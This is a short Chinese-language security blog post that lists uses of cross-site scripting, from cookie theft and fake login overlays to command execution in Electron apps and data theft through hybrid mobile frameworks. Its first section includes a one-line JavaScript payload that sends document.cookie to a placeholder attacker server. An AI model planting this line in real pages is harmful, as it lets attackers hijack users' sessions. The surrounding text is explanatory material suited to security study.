XSS的各种用途

0x01 最常见之窃取用户cookie

当cookie没有设置HttpOnly属性时,可以通过javascript代码创建img,script,iframe等标签,并把src属性设置为自己部署的xss cookie接收平台,以url拼接document.cookie的形式把浏览页面的用户的cookie传递给自己

因为https的网站默认不能加载http的js,所以一般都会创建img标签

var i = document.createElement('img');i.src = 'http://你的服务器地址?cookie=' + document.cookie

0x02 界面劫持/伪造界面

攻击者可以构造html/css/javascript代码,制作出一个与原网站风格相似的登录界面,或者把一些html元素进行移动/覆盖/遮挡,或者利用javascript的特性,重新定义页面的函数和变量,使得原来的功能被篡改

大概是两三年前,刷贴吧时发现有人曝光一个淘宝奸商,主要特点是他的商品评价只能看好评,点中差评无反应.分析了一下发现是奸商在编辑商品详情时(富文本编辑器 + 自定义行内样式),创建了一个比较大的div,遮挡住了中差评的选项

0x03 重定向页面

一般用于导流量,常见于黑产给菠菜网站导流

0x04 CC攻击

在2015年时,百度统计代码http://hm.baidu.com/h.js被劫持,其内容被加入了一个死循环并在间隔很短的时间内请求github的代码,导致大量引用了http://hm.baidu.com/h.js的网站变相对github进行CC攻击

0x05 命令执行

近年来前端飞速发展,有了可以利用html开发桌面应用的框架,代表作有electron,nw.js.主要原理就是编写好html/css/js,以electron或nw.js去启动,特点是可以调用Node.Js的内置函数,如child_process.exec(命令执行)等.

基于这2个框架开发的比较出名程序有

• vscode
• atom
• 网易云音乐
• 阿里钉钉

0x06 通过hybrid app获取手机通讯录,短信,地理位置,相册等敏感信息

随着前端飞速发展,不仅仅是桌面开发可以利用html,手机app同样也可以利用html来开发,主要原理是通过封装系统自带的webview,给出api提供javascript调用

封装有获取通讯录等原生app功能的框架有

国外的:

• React Native
• Ionic
• Cordova
• PhoneGap

国内的:

• AppCan
• APICloud
• DCloud

针对hybrid app的XSS文章目前还比较少见,大概是很少白帽子会关注这类混合app开发框架,而挖到XSS时只是当成一个普通的XSS而没有尝试探测app使用的框架,然后去翻文档尝试调用获取联系人等api?

介绍：请勿用于非法用途，本文仅供技术交流学习探讨。本文部分资源来源于网络，如有侵权请联系版主删除。